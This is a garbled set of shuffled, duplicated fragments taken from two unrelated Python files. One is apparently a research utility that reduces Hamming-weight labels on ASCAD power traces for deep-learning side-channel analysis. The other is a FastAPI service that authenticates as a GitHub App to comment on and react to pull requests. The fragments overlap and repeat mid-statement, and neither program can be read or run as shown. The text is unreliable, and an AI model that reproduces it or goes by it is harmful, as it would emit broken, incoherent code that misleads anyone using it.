\"\"\" hamming_weight", "tensorflow.python.keras.utils.np_utils import to_categorical # TODO replace with mlp_hw notebook variants from src.tools.dl import", "is_high if balanced: traces, la_bit = balance(traces, la_bit) return traces, encode(la_bit, 2) def", "= np.random.binomial(1, .5, len(x)).astype(bool) filter_ixs = np.logical_or(hamming_weight < 4, is_random) traces, la_bit =", "return traces, encode(la_bit, 2) if __name__ == '__main__': trace_set = TraceSetHW(Database.ascad, Pollution(PollutionType.gauss, 0),", "4 is_high = hamming_weight[filter_ixs] > 4 traces, la_bit = x[filter_ixs], is_high if balanced:", "= TraceSetHW(Database.ascad, Pollution(PollutionType.gauss, 0), limits=(1000, 1000)) x9, y9, x9_att, y9_att = prepare_traces_dl(*trace_set.profile(), *trace_set.attack())", "4 traces, la_bit = x[filter_ixs], is_high if balanced: traces, la_bit = balance(traces, la_bit)", "'__main__': trace_set = TraceSetHW(Database.ascad, Pollution(PollutionType.gauss, 0), limits=(1000, 1000)) x9, y9, x9_att, y9_att =", "classes. \"\"\" hamming_weight = np.argmax(y, axis=1) filter_ixs = hamming_weight != 4 is_high =", "reduce_fixed_fixed(x, y, balanced=False): \"\"\" Takes 9-class (categorical) hamming weight labels and reduces it", "= np.argmax(y, axis=1) filter_ixs = hamming_weight != 4 is_high = hamming_weight[filter_ixs] > 4", "= hamming_weight != 4 is_high = hamming_weight[filter_ixs] > 4 traces, la_bit = x[filter_ixs],", "labels and reduces it to 2 semi-fixed classes. \"\"\" hamming_weight = np.argmax(y, axis=1)", "if balanced: traces, la_bit = balance(traces, la_bit) return traces, encode(la_bit, 2) def reduce_fixed_random(x,", "\"\"\" hamming_weight = np.argmax(y, axis=1) filter_ixs = hamming_weight != 4 is_high = hamming_weight[filter_ixs]", "2) if __name__ == '__main__': trace_set = TraceSetHW(Database.ascad, Pollution(PollutionType.gauss, 0), limits=(1000, 1000)) x9,", "2 semi-fixed classes. 
\"\"\" hamming_weight = np.argmax(y, axis=1) filter_ixs = hamming_weight != 4", "1000)) x9, y9, x9_att, y9_att = prepare_traces_dl(*trace_set.profile(), *trace_set.attack()) x2, y2 = reduce_fixed_fixed(x9, y9,", "= x[filter_ixs], is_high if balanced: traces, la_bit = balance(traces, la_bit) return traces, encode(la_bit,", "la_bit = x[filter_ixs], is_high if balanced: traces, la_bit = balance(traces, la_bit) return traces,", "hamming weight labels and reduces it to 2 semi-fixed classes. \"\"\" hamming_weight =", "it to 2 semi-fixed classes. \"\"\" hamming_weight = np.argmax(y, axis=1) filter_ixs = hamming_weight", "PollutionType, Pollution from src.trace_set.set_hw import TraceSetHW def reduce_fixed_fixed(x, y, balanced=False): \"\"\" Takes 9-class", "def reduce_fixed_fixed(x, y, balanced=False): \"\"\" Takes 9-class (categorical) hamming weight labels and reduces", "src.trace_set.pollution import PollutionType, Pollution from src.trace_set.set_hw import TraceSetHW def reduce_fixed_fixed(x, y, balanced=False): \"\"\"", "= x[filter_ixs], is_random[filter_ixs] if balanced: traces, la_bit = balance(traces, la_bit) return traces, encode(la_bit,", "reduces it to 2 classes: semi-fixed and random. \"\"\" hamming_weight = np.argmax(y, axis=1)", "> 4 traces, la_bit = x[filter_ixs], is_high if balanced: traces, la_bit = balance(traces,", "balance(traces, la_bit) return traces, encode(la_bit, 2) if __name__ == '__main__': trace_set = TraceSetHW(Database.ascad,", "balance from src.trace_set.database import Database from src.trace_set.pollution import PollutionType, Pollution from src.trace_set.set_hw import", "classes: semi-fixed and random. \"\"\" hamming_weight = np.argmax(y, axis=1) is_random = np.random.binomial(1, .5,", "traces, la_bit = balance(traces, la_bit) return traces, encode(la_bit, 2) if __name__ == '__main__':", "random. 
\"\"\" hamming_weight = np.argmax(y, axis=1) is_random = np.random.binomial(1, .5, len(x)).astype(bool) filter_ixs =", "traces, la_bit = x[filter_ixs], is_random[filter_ixs] if balanced: traces, la_bit = balance(traces, la_bit) return", "np.argmax(y, axis=1) is_random = np.random.binomial(1, .5, len(x)).astype(bool) filter_ixs = np.logical_or(hamming_weight < 4, is_random)", "hamming weight labels and reduces it to 2 classes: semi-fixed and random. \"\"\"", "src.tools.la import balance from src.trace_set.database import Database from src.trace_set.pollution import PollutionType, Pollution from", "src.tools.dl import encode from src.tools.la import balance from src.trace_set.database import Database from src.trace_set.pollution", "balance(traces, la_bit) return traces, encode(la_bit, 2) def reduce_fixed_random(x, y, balanced=False): \"\"\" Takes 9-class", "balanced: traces, la_bit = balance(traces, la_bit) return traces, encode(la_bit, 2) def reduce_fixed_random(x, y,", "reduces it to 2 semi-fixed classes. \"\"\" hamming_weight = np.argmax(y, axis=1) filter_ixs =", "and reduces it to 2 classes: semi-fixed and random. 
\"\"\" hamming_weight = np.argmax(y,", "src.dlla.hw import prepare_traces_dl from tensorflow.python.keras.utils.np_utils import to_categorical # TODO replace with mlp_hw notebook", "!= 4 is_high = hamming_weight[filter_ixs] > 4 traces, la_bit = x[filter_ixs], is_high if", "from src.trace_set.pollution import PollutionType, Pollution from src.trace_set.set_hw import TraceSetHW def reduce_fixed_fixed(x, y, balanced=False):", "np.argmax(y, axis=1) filter_ixs = hamming_weight != 4 is_high = hamming_weight[filter_ixs] > 4 traces,", "axis=1) is_random = np.random.binomial(1, .5, len(x)).astype(bool) filter_ixs = np.logical_or(hamming_weight < 4, is_random) traces,", "traces, encode(la_bit, 2) def reduce_fixed_random(x, y, balanced=False): \"\"\" Takes 9-class (categorical) hamming weight", "prepare_traces_dl from tensorflow.python.keras.utils.np_utils import to_categorical # TODO replace with mlp_hw notebook variants from", "filter_ixs = np.logical_or(hamming_weight < 4, is_random) traces, la_bit = x[filter_ixs], is_random[filter_ixs] if balanced:", "and reduces it to 2 semi-fixed classes. \"\"\" hamming_weight = np.argmax(y, axis=1) filter_ixs", "and random. 
\"\"\" hamming_weight = np.argmax(y, axis=1) is_random = np.random.binomial(1, .5, len(x)).astype(bool) filter_ixs", "limits=(1000, 1000)) x9, y9, x9_att, y9_att = prepare_traces_dl(*trace_set.profile(), *trace_set.attack()) x2, y2 = reduce_fixed_fixed(x9,", "TraceSetHW(Database.ascad, Pollution(PollutionType.gauss, 0), limits=(1000, 1000)) x9, y9, x9_att, y9_att = prepare_traces_dl(*trace_set.profile(), *trace_set.attack()) x2,", "reduce_fixed_random(x, y, balanced=False): \"\"\" Takes 9-class (categorical) hamming weight labels and reduces it", "hamming_weight != 4 is_high = hamming_weight[filter_ixs] > 4 traces, la_bit = x[filter_ixs], is_high", "x[filter_ixs], is_high if balanced: traces, la_bit = balance(traces, la_bit) return traces, encode(la_bit, 2)", "la_bit = balance(traces, la_bit) return traces, encode(la_bit, 2) def reduce_fixed_random(x, y, balanced=False): \"\"\"", "from src.trace_set.set_hw import TraceSetHW def reduce_fixed_fixed(x, y, balanced=False): \"\"\" Takes 9-class (categorical) hamming", "balanced: traces, la_bit = balance(traces, la_bit) return traces, encode(la_bit, 2) if __name__ ==", "= balance(traces, la_bit) return traces, encode(la_bit, 2) def reduce_fixed_random(x, y, balanced=False): \"\"\" Takes", "la_bit = x[filter_ixs], is_random[filter_ixs] if balanced: traces, la_bit = balance(traces, la_bit) return traces,", "mlp_hw notebook variants from src.tools.dl import encode from src.tools.la import balance from src.trace_set.database", "src.trace_set.database import Database from src.trace_set.pollution import PollutionType, Pollution from src.trace_set.set_hw import TraceSetHW def", "len(x)).astype(bool) filter_ixs = np.logical_or(hamming_weight < 4, is_random) traces, la_bit = x[filter_ixs], is_random[filter_ixs] if", "<filename>src/trace_set/transform.py import numpy as np from src.dlla.hw import prepare_traces_dl from tensorflow.python.keras.utils.np_utils import to_categorical", "traces, la_bit = x[filter_ixs], is_high if 
balanced: traces, la_bit = balance(traces, la_bit) return", "encode(la_bit, 2) def reduce_fixed_random(x, y, balanced=False): \"\"\" Takes 9-class (categorical) hamming weight labels", "import to_categorical # TODO replace with mlp_hw notebook variants from src.tools.dl import encode", "hamming_weight = np.argmax(y, axis=1) filter_ixs = hamming_weight != 4 is_high = hamming_weight[filter_ixs] >", "def reduce_fixed_random(x, y, balanced=False): \"\"\" Takes 9-class (categorical) hamming weight labels and reduces", "is_random[filter_ixs] if balanced: traces, la_bit = balance(traces, la_bit) return traces, encode(la_bit, 2) if", "to 2 semi-fixed classes. \"\"\" hamming_weight = np.argmax(y, axis=1) filter_ixs = hamming_weight !=", "hamming_weight[filter_ixs] > 4 traces, la_bit = x[filter_ixs], is_high if balanced: traces, la_bit =", "Takes 9-class (categorical) hamming weight labels and reduces it to 2 classes: semi-fixed", "x9, y9, x9_att, y9_att = prepare_traces_dl(*trace_set.profile(), *trace_set.attack()) x2, y2 = reduce_fixed_fixed(x9, y9, balanced=True)", "la_bit = balance(traces, la_bit) return traces, encode(la_bit, 2) if __name__ == '__main__': trace_set", "it to 2 classes: semi-fixed and random. \"\"\" hamming_weight = np.argmax(y, axis=1) is_random", "import balance from src.trace_set.database import Database from src.trace_set.pollution import PollutionType, Pollution from src.trace_set.set_hw", "from src.trace_set.database import Database from src.trace_set.pollution import PollutionType, Pollution from src.trace_set.set_hw import TraceSetHW", "semi-fixed classes. \"\"\" hamming_weight = np.argmax(y, axis=1) filter_ixs = hamming_weight != 4 is_high", "semi-fixed and random. 
\"\"\" hamming_weight = np.argmax(y, axis=1) is_random = np.random.binomial(1, .5, len(x)).astype(bool)", "\"\"\" Takes 9-class (categorical) hamming weight labels and reduces it to 2 semi-fixed", "TODO replace with mlp_hw notebook variants from src.tools.dl import encode from src.tools.la import", "Pollution from src.trace_set.set_hw import TraceSetHW def reduce_fixed_fixed(x, y, balanced=False): \"\"\" Takes 9-class (categorical)", "(categorical) hamming weight labels and reduces it to 2 classes: semi-fixed and random.", "9-class (categorical) hamming weight labels and reduces it to 2 classes: semi-fixed and", "trace_set = TraceSetHW(Database.ascad, Pollution(PollutionType.gauss, 0), limits=(1000, 1000)) x9, y9, x9_att, y9_att = prepare_traces_dl(*trace_set.profile(),", "is_random = np.random.binomial(1, .5, len(x)).astype(bool) filter_ixs = np.logical_or(hamming_weight < 4, is_random) traces, la_bit", "np.logical_or(hamming_weight < 4, is_random) traces, la_bit = x[filter_ixs], is_random[filter_ixs] if balanced: traces, la_bit", "import prepare_traces_dl from tensorflow.python.keras.utils.np_utils import to_categorical # TODO replace with mlp_hw notebook variants", "with mlp_hw notebook variants from src.tools.dl import encode from src.tools.la import balance from", "\"\"\" hamming_weight = np.argmax(y, axis=1) is_random = np.random.binomial(1, .5, len(x)).astype(bool) filter_ixs = np.logical_or(hamming_weight", "hamming_weight = np.argmax(y, axis=1) is_random = np.random.binomial(1, .5, len(x)).astype(bool) filter_ixs = np.logical_or(hamming_weight <", "x[filter_ixs], is_random[filter_ixs] if balanced: traces, la_bit = balance(traces, la_bit) return traces, encode(la_bit, 2)", "numpy as np from src.dlla.hw import prepare_traces_dl from tensorflow.python.keras.utils.np_utils import to_categorical # TODO", "filter_ixs = hamming_weight != 4 is_high = hamming_weight[filter_ixs] > 4 traces, la_bit =", "= np.argmax(y, axis=1) is_random = np.random.binomial(1, .5, 
len(x)).astype(bool) filter_ixs = np.logical_or(hamming_weight < 4,", "from src.dlla.hw import prepare_traces_dl from tensorflow.python.keras.utils.np_utils import to_categorical # TODO replace with mlp_hw", "from src.tools.la import balance from src.trace_set.database import Database from src.trace_set.pollution import PollutionType, Pollution", "y, balanced=False): \"\"\" Takes 9-class (categorical) hamming weight labels and reduces it to", "np from src.dlla.hw import prepare_traces_dl from tensorflow.python.keras.utils.np_utils import to_categorical # TODO replace with", "to 2 classes: semi-fixed and random. \"\"\" hamming_weight = np.argmax(y, axis=1) is_random =", "= balance(traces, la_bit) return traces, encode(la_bit, 2) if __name__ == '__main__': trace_set =", "Pollution(PollutionType.gauss, 0), limits=(1000, 1000)) x9, y9, x9_att, y9_att = prepare_traces_dl(*trace_set.profile(), *trace_set.attack()) x2, y2", "import PollutionType, Pollution from src.trace_set.set_hw import TraceSetHW def reduce_fixed_fixed(x, y, balanced=False): \"\"\" Takes", "src.trace_set.set_hw import TraceSetHW def reduce_fixed_fixed(x, y, balanced=False): \"\"\" Takes 9-class (categorical) hamming weight", ".5, len(x)).astype(bool) filter_ixs = np.logical_or(hamming_weight < 4, is_random) traces, la_bit = x[filter_ixs], is_random[filter_ixs]", "import TraceSetHW def reduce_fixed_fixed(x, y, balanced=False): \"\"\" Takes 9-class (categorical) hamming weight labels" ]
[ "ForbiddenError: raise HTTPException(403, f\"Application not setup for the repository {action.repo}\") except NotFoundError: raise", "react_to_pr(action: ActionIn): gh = login_as_installation(action) issue = get_pr(gh, action).issue() issue._post( issue._api + '/reactions',", "get_pr(gh, action).create_comment(action.content) return \"Post Success\", 200 @app.post('/reaction') def react_to_pr(action: ActionIn): gh = login_as_installation(action)", "gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER) install = gh.app_installation_for_repository(action.owner, action.repository) gh.login_as_app_installation( GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER, install.id ) return gh", "gh = login_as_installation(action) issue = get_pr(gh, action).issue() issue._post( issue._api + '/reactions', data={\"content\": action.content},", "GITHUB_APP_IDENTIFIER, install.id ) return gh except NotFoundError: raise HTTPException(404, f\"OpeAPI Perf App not", "ActionIn): try: gh = GitHub() gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER) install = gh.app_installation_for_repository(action.owner, action.repository) gh.login_as_app_installation( GITHUB_PRIVATE_KEY.encode(),", "= login_as_installation(action) issue = get_pr(gh, action).issue() issue._post( issue._api + '/reactions', data={\"content\": action.content}, headers={'Accept':", "try: gh = GitHub() gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER) install = gh.app_installation_for_repository(action.owner, action.repository) gh.login_as_app_installation( GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER,", "= os.environ.get('APP_IDENTIFIER', None) if not GITHUB_PRIVATE_KEY: GITHUB_PRIVATE_KEY = open('private-key.pem', 'rt').read() app = FastAPI()", "@app.post('/comment') def comment_on_pr(action: ActionIn): gh = login_as_installation(action) get_pr(gh, action).create_comment(action.content) return \"Post Success\", 200", "from github3.github import GitHub from 
github3.pulls import PullRequest from pydantic import BaseModel GITHUB_PRIVATE_KEY", "action: ActionIn) -> PullRequest: try: return gh.pull_request( owner=action.owner, repository=action.repository, number=action.pr_number ) except ForbiddenError:", "from github3.pulls import PullRequest from pydantic import BaseModel GITHUB_PRIVATE_KEY = os.environ.get('APP_PRIVATE_KEY', None) GITHUB_APP_IDENTIFIER", "Success\", 200 @app.post('/reaction') def react_to_pr(action: ActionIn): gh = login_as_installation(action) issue = get_pr(gh, action).issue()", "os.environ.get('APP_PRIVATE_KEY', None) GITHUB_APP_IDENTIFIER = os.environ.get('APP_IDENTIFIER', None) if not GITHUB_PRIVATE_KEY: GITHUB_PRIVATE_KEY = open('private-key.pem', 'rt').read()", "login_as_installation(action) issue = get_pr(gh, action).issue() issue._post( issue._api + '/reactions', data={\"content\": action.content}, headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'}", "= FastAPI() class ActionIn(BaseModel): content: str owner: str repository: str pr_number: int @property", "not GITHUB_PRIVATE_KEY: GITHUB_PRIVATE_KEY = open('private-key.pem', 'rt').read() app = FastAPI() class ActionIn(BaseModel): content: str", "NotFoundError, ForbiddenError from github3.github import GitHub from github3.pulls import PullRequest from pydantic import", "action).create_comment(action.content) return \"Post Success\", 200 @app.post('/reaction') def react_to_pr(action: ActionIn): gh = login_as_installation(action) issue", "HTTPException(404, f\"OpeAPI Perf App not installed to {action.repo}\") def get_pr(gh, action: ActionIn) ->", "import os from fastapi import FastAPI, HTTPException from github3.exceptions import NotFoundError, ForbiddenError from", "200 def login_as_installation(action: ActionIn): try: gh = GitHub() gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER) install = gh.app_installation_for_repository(action.owner,", "f\"Application not setup for the repository {action.repo}\") 
except NotFoundError: raise HTTPException(404, f\"PR #{action.pr_number}", ") except ForbiddenError: raise HTTPException(403, f\"Application not setup for the repository {action.repo}\") except", ") return gh except NotFoundError: raise HTTPException(404, f\"OpeAPI Perf App not installed to", "install = gh.app_installation_for_repository(action.owner, action.repository) gh.login_as_app_installation( GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER, install.id ) return gh except NotFoundError:", "= gh.app_installation_for_repository(action.owner, action.repository) gh.login_as_app_installation( GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER, install.id ) return gh except NotFoundError: raise", "+ '/reactions', data={\"content\": action.content}, headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'} ) return \"Post Success\", 200 def login_as_installation(action:", "{action.repo}\") def get_pr(gh, action: ActionIn) -> PullRequest: try: return gh.pull_request( owner=action.owner, repository=action.repository, number=action.pr_number", "str owner: str repository: str pr_number: int @property def repo(self) -> str: return", "raise HTTPException(404, f\"OpeAPI Perf App not installed to {action.repo}\") def get_pr(gh, action: ActionIn)", "repository {action.repo}\") except NotFoundError: raise HTTPException(404, f\"PR #{action.pr_number} does not exist in {action.repo}\")", "installed to {action.repo}\") def get_pr(gh, action: ActionIn) -> PullRequest: try: return gh.pull_request( owner=action.owner,", "github3.pulls import PullRequest from pydantic import BaseModel GITHUB_PRIVATE_KEY = os.environ.get('APP_PRIVATE_KEY', None) GITHUB_APP_IDENTIFIER =", "None) if not GITHUB_PRIVATE_KEY: GITHUB_PRIVATE_KEY = open('private-key.pem', 'rt').read() app = FastAPI() class ActionIn(BaseModel):", "gh.login_as_app_installation( GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER, install.id ) return gh except NotFoundError: raise HTTPException(404, f\"OpeAPI 
Perf", "gh except NotFoundError: raise HTTPException(404, f\"OpeAPI Perf App not installed to {action.repo}\") def", "gh = GitHub() gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER) install = gh.app_installation_for_repository(action.owner, action.repository) gh.login_as_app_installation( GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER, install.id", "the repository {action.repo}\") except NotFoundError: raise HTTPException(404, f\"PR #{action.pr_number} does not exist in", "content: str owner: str repository: str pr_number: int @property def repo(self) -> str:", "os.environ.get('APP_IDENTIFIER', None) if not GITHUB_PRIVATE_KEY: GITHUB_PRIVATE_KEY = open('private-key.pem', 'rt').read() app = FastAPI() class", "PullRequest: try: return gh.pull_request( owner=action.owner, repository=action.repository, number=action.pr_number ) except ForbiddenError: raise HTTPException(403, f\"Application", "def react_to_pr(action: ActionIn): gh = login_as_installation(action) issue = get_pr(gh, action).issue() issue._post( issue._api +", "def login_as_installation(action: ActionIn): try: gh = GitHub() gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER) install = gh.app_installation_for_repository(action.owner, action.repository)", "import FastAPI, HTTPException from github3.exceptions import NotFoundError, ForbiddenError from github3.github import GitHub from", "GITHUB_PRIVATE_KEY = os.environ.get('APP_PRIVATE_KEY', None) GITHUB_APP_IDENTIFIER = os.environ.get('APP_IDENTIFIER', None) if not GITHUB_PRIVATE_KEY: GITHUB_PRIVATE_KEY =", "for the repository {action.repo}\") except NotFoundError: raise HTTPException(404, f\"PR #{action.pr_number} does not exist", "-> str: return f'{self.owner}/{self.repository}' @app.post('/comment') def comment_on_pr(action: ActionIn): gh = login_as_installation(action) get_pr(gh, action).create_comment(action.content)", "github3.github import GitHub from github3.pulls import PullRequest from pydantic import BaseModel 
GITHUB_PRIVATE_KEY =", "str repository: str pr_number: int @property def repo(self) -> str: return f'{self.owner}/{self.repository}' @app.post('/comment')", "not setup for the repository {action.repo}\") except NotFoundError: raise HTTPException(404, f\"PR #{action.pr_number} does", "action).issue() issue._post( issue._api + '/reactions', data={\"content\": action.content}, headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'} ) return \"Post Success\",", "GITHUB_PRIVATE_KEY = open('private-key.pem', 'rt').read() app = FastAPI() class ActionIn(BaseModel): content: str owner: str", "github3.exceptions import NotFoundError, ForbiddenError from github3.github import GitHub from github3.pulls import PullRequest from", "ActionIn): gh = login_as_installation(action) get_pr(gh, action).create_comment(action.content) return \"Post Success\", 200 @app.post('/reaction') def react_to_pr(action:", "import GitHub from github3.pulls import PullRequest from pydantic import BaseModel GITHUB_PRIVATE_KEY = os.environ.get('APP_PRIVATE_KEY',", "\"Post Success\", 200 def login_as_installation(action: ActionIn): try: gh = GitHub() gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER) install", "get_pr(gh, action: ActionIn) -> PullRequest: try: return gh.pull_request( owner=action.owner, repository=action.repository, number=action.pr_number ) except", "return f'{self.owner}/{self.repository}' @app.post('/comment') def comment_on_pr(action: ActionIn): gh = login_as_installation(action) get_pr(gh, action).create_comment(action.content) return \"Post", "PullRequest from pydantic import BaseModel GITHUB_PRIVATE_KEY = os.environ.get('APP_PRIVATE_KEY', None) GITHUB_APP_IDENTIFIER = os.environ.get('APP_IDENTIFIER', None)", "gh.app_installation_for_repository(action.owner, action.repository) gh.login_as_app_installation( GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER, install.id ) return gh except NotFoundError: raise HTTPException(404,", "owner=action.owner, 
repository=action.repository, number=action.pr_number ) except ForbiddenError: raise HTTPException(403, f\"Application not setup for the", "pr_number: int @property def repo(self) -> str: return f'{self.owner}/{self.repository}' @app.post('/comment') def comment_on_pr(action: ActionIn):", "repository=action.repository, number=action.pr_number ) except ForbiddenError: raise HTTPException(403, f\"Application not setup for the repository", "issue = get_pr(gh, action).issue() issue._post( issue._api + '/reactions', data={\"content\": action.content}, headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'} )", "gh.pull_request( owner=action.owner, repository=action.repository, number=action.pr_number ) except ForbiddenError: raise HTTPException(403, f\"Application not setup for", "@app.post('/reaction') def react_to_pr(action: ActionIn): gh = login_as_installation(action) issue = get_pr(gh, action).issue() issue._post( issue._api", "str pr_number: int @property def repo(self) -> str: return f'{self.owner}/{self.repository}' @app.post('/comment') def comment_on_pr(action:", "Perf App not installed to {action.repo}\") def get_pr(gh, action: ActionIn) -> PullRequest: try:", "= open('private-key.pem', 'rt').read() app = FastAPI() class ActionIn(BaseModel): content: str owner: str repository:", "'/reactions', data={\"content\": action.content}, headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'} ) return \"Post Success\", 200 def login_as_installation(action: ActionIn):", "install.id ) return gh except NotFoundError: raise HTTPException(404, f\"OpeAPI Perf App not installed", "try: return gh.pull_request( owner=action.owner, repository=action.repository, number=action.pr_number ) except ForbiddenError: raise HTTPException(403, f\"Application not", "action.repository) gh.login_as_app_installation( GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER, install.id ) return gh except NotFoundError: raise HTTPException(404, f\"OpeAPI", "from 
fastapi import FastAPI, HTTPException from github3.exceptions import NotFoundError, ForbiddenError from github3.github import", "comment_on_pr(action: ActionIn): gh = login_as_installation(action) get_pr(gh, action).create_comment(action.content) return \"Post Success\", 200 @app.post('/reaction') def", "get_pr(gh, action).issue() issue._post( issue._api + '/reactions', data={\"content\": action.content}, headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'} ) return \"Post", "import PullRequest from pydantic import BaseModel GITHUB_PRIVATE_KEY = os.environ.get('APP_PRIVATE_KEY', None) GITHUB_APP_IDENTIFIER = os.environ.get('APP_IDENTIFIER',", "fastapi import FastAPI, HTTPException from github3.exceptions import NotFoundError, ForbiddenError from github3.github import GitHub", "ActionIn): gh = login_as_installation(action) issue = get_pr(gh, action).issue() issue._post( issue._api + '/reactions', data={\"content\":", "not installed to {action.repo}\") def get_pr(gh, action: ActionIn) -> PullRequest: try: return gh.pull_request(", "repo(self) -> str: return f'{self.owner}/{self.repository}' @app.post('/comment') def comment_on_pr(action: ActionIn): gh = login_as_installation(action) get_pr(gh,", "from github3.exceptions import NotFoundError, ForbiddenError from github3.github import GitHub from github3.pulls import PullRequest", "'rt').read() app = FastAPI() class ActionIn(BaseModel): content: str owner: str repository: str pr_number:", "= get_pr(gh, action).issue() issue._post( issue._api + '/reactions', data={\"content\": action.content}, headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'} ) return", "app = FastAPI() class ActionIn(BaseModel): content: str owner: str repository: str pr_number: int", "ActionIn(BaseModel): content: str owner: str repository: str pr_number: int @property def repo(self) ->", "f\"OpeAPI Perf App not installed to {action.repo}\") def get_pr(gh, action: ActionIn) -> PullRequest:", "class 
ActionIn(BaseModel): content: str owner: str repository: str pr_number: int @property def repo(self)", "'application/vnd.github.squirrel-girl-preview+json'} ) return \"Post Success\", 200 def login_as_installation(action: ActionIn): try: gh = GitHub()", "GitHub from github3.pulls import PullRequest from pydantic import BaseModel GITHUB_PRIVATE_KEY = os.environ.get('APP_PRIVATE_KEY', None)", "def repo(self) -> str: return f'{self.owner}/{self.repository}' @app.post('/comment') def comment_on_pr(action: ActionIn): gh = login_as_installation(action)", "to {action.repo}\") def get_pr(gh, action: ActionIn) -> PullRequest: try: return gh.pull_request( owner=action.owner, repository=action.repository,", "int @property def repo(self) -> str: return f'{self.owner}/{self.repository}' @app.post('/comment') def comment_on_pr(action: ActionIn): gh", "GITHUB_PRIVATE_KEY: GITHUB_PRIVATE_KEY = open('private-key.pem', 'rt').read() app = FastAPI() class ActionIn(BaseModel): content: str owner:", "HTTPException from github3.exceptions import NotFoundError, ForbiddenError from github3.github import GitHub from github3.pulls import", "data={\"content\": action.content}, headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'} ) return \"Post Success\", 200 def login_as_installation(action: ActionIn): try:", "except NotFoundError: raise HTTPException(404, f\"OpeAPI Perf App not installed to {action.repo}\") def get_pr(gh,", "-> PullRequest: try: return gh.pull_request( owner=action.owner, repository=action.repository, number=action.pr_number ) except ForbiddenError: raise HTTPException(403,", "str: return f'{self.owner}/{self.repository}' @app.post('/comment') def comment_on_pr(action: ActionIn): gh = login_as_installation(action) get_pr(gh, action).create_comment(action.content) return", "Success\", 200 def login_as_installation(action: ActionIn): try: gh = GitHub() gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER) install =", "= 
os.environ.get('APP_PRIVATE_KEY', None) GITHUB_APP_IDENTIFIER = os.environ.get('APP_IDENTIFIER', None) if not GITHUB_PRIVATE_KEY: GITHUB_PRIVATE_KEY = open('private-key.pem',", "ActionIn) -> PullRequest: try: return gh.pull_request( owner=action.owner, repository=action.repository, number=action.pr_number ) except ForbiddenError: raise", "import NotFoundError, ForbiddenError from github3.github import GitHub from github3.pulls import PullRequest from pydantic", "action.content}, headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'} ) return \"Post Success\", 200 def login_as_installation(action: ActionIn): try: gh", "return \"Post Success\", 200 def login_as_installation(action: ActionIn): try: gh = GitHub() gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER)", "open('private-key.pem', 'rt').read() app = FastAPI() class ActionIn(BaseModel): content: str owner: str repository: str", "headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'} ) return \"Post Success\", 200 def login_as_installation(action: ActionIn): try: gh =", "gh = login_as_installation(action) get_pr(gh, action).create_comment(action.content) return \"Post Success\", 200 @app.post('/reaction') def react_to_pr(action: ActionIn):", "= login_as_installation(action) get_pr(gh, action).create_comment(action.content) return \"Post Success\", 200 @app.post('/reaction') def react_to_pr(action: ActionIn): gh", "return gh except NotFoundError: raise HTTPException(404, f\"OpeAPI Perf App not installed to {action.repo}\")", "App not installed to {action.repo}\") def get_pr(gh, action: ActionIn) -> PullRequest: try: return", "f'{self.owner}/{self.repository}' @app.post('/comment') def comment_on_pr(action: ActionIn): gh = login_as_installation(action) get_pr(gh, action).create_comment(action.content) return \"Post Success\",", "login_as_installation(action) get_pr(gh, action).create_comment(action.content) return \"Post Success\", 200 @app.post('/reaction') def 
react_to_pr(action: ActionIn): gh =", "login_as_installation(action: ActionIn): try: gh = GitHub() gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER) install = gh.app_installation_for_repository(action.owner, action.repository) gh.login_as_app_installation(", "setup for the repository {action.repo}\") except NotFoundError: raise HTTPException(404, f\"PR #{action.pr_number} does not", "NotFoundError: raise HTTPException(404, f\"OpeAPI Perf App not installed to {action.repo}\") def get_pr(gh, action:", "FastAPI() class ActionIn(BaseModel): content: str owner: str repository: str pr_number: int @property def", "HTTPException(403, f\"Application not setup for the repository {action.repo}\") except NotFoundError: raise HTTPException(404, f\"PR", "GITHUB_APP_IDENTIFIER) install = gh.app_installation_for_repository(action.owner, action.repository) gh.login_as_app_installation( GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER, install.id ) return gh except", "= GitHub() gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER) install = gh.app_installation_for_repository(action.owner, action.repository) gh.login_as_app_installation( GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER, install.id )", "os from fastapi import FastAPI, HTTPException from github3.exceptions import NotFoundError, ForbiddenError from github3.github", "issue._post( issue._api + '/reactions', data={\"content\": action.content}, headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'} ) return \"Post Success\", 200", "owner: str repository: str pr_number: int @property def repo(self) -> str: return f'{self.owner}/{self.repository}'", "FastAPI, HTTPException from github3.exceptions import NotFoundError, ForbiddenError from github3.github import GitHub from github3.pulls", "except ForbiddenError: raise HTTPException(403, f\"Application not setup for the repository {action.repo}\") except NotFoundError:", "def comment_on_pr(action: 